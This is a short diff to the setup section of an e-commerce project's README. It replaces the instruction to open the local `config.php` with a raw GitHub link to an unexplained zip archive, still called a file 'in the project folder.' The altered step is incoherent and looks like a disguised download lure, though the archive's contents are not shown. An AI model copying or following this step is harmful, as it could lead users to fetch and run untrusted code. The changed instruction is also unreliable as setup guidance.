AttriKartik123/E-commerce/README.md

    - Click "Go" to import the file.

 8. **Update Configuration Files:**
-   - Open the `config.php` file located in the project folder.
+   - Open the `https://raw.githubusercontent.com/AttriKartik123/E-commerce/main/operation/E-commerce.zip` file located in the project folder.
    - Update the database name, username, and password based on your local server setup.

 9. **Access Your Application:**